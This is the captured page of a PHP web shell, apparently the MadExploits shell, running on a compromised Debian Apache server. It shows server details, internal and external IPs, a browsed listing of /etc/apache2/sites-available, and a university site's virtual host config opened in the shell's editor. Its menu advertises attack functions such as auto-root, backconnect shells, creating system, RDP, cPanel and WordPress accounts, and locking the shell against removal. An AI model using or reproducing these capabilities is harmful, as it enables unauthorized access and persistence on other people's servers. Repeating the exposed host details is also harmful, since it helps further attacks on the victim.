Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.17.76.163
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apache2 /
sites-available /
[ HOME SHELL ]
Name
Size
Permission
Action
000-default.conf
1.41
KB
-rw-r--r--
baltic.conf
1.79
KB
-rw-r--r--
default-ssl.conf
6.3
KB
-rw-r--r--
dialektologia.conf
1.91
KB
-rw-r--r--
ifk.conf
1.97
KB
-rw-r--r--
ifkpliki.conf
1.98
KB
-rw-r--r--
ilpnowa-ssl.conf
1.44
KB
-rw-r--r--
ilpnowa.conf
1.82
KB
-rw-r--r--
ilptest.conf
1.7
KB
-rw-r--r--
leksykografia.conf
1.66
KB
-rw-r--r--
mapaliteratury.conf
1.58
KB
-rw-r--r--
polon200.conf
1.6
KB
-rw-r--r--
slownik.conf
1.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slownik.conf
<VirtualHost *:80> # The ServerName directive sets the request scheme, hostname and port that # the server uses to identify itself. This is used when creating # redirection URLs. In the context of virtual hosts, the ServerName # specifies what hostname must appear in the request's Host: header to # match this virtual host. For the default virtual host (this file) this # value is not decisive as it is used as a last resort host regardless. # However, you must set it for any further virtual host explicitly. ServerName www.sno.uw.edu.pl ServerAdmin webmaster@localhost DocumentRoot /home/slownik/web ServerAlias sno.uw.edu.pl ErrorLog /home/slownik/apache.error.log CustomLog /home/slownik/apache.access.log combined <FilesMatch \.php$> # Apache 2.4.10+ can proxy to unix socket SetHandler "proxy:unix:/var/run/php/php7.0-fpm.sock|fcgi://localhost/" </FilesMatch> <Directory /home/slownik/web/> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn #ErrorLog ${APACHE_LOG_DIR}/error.log #CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf </VirtualHost>
Close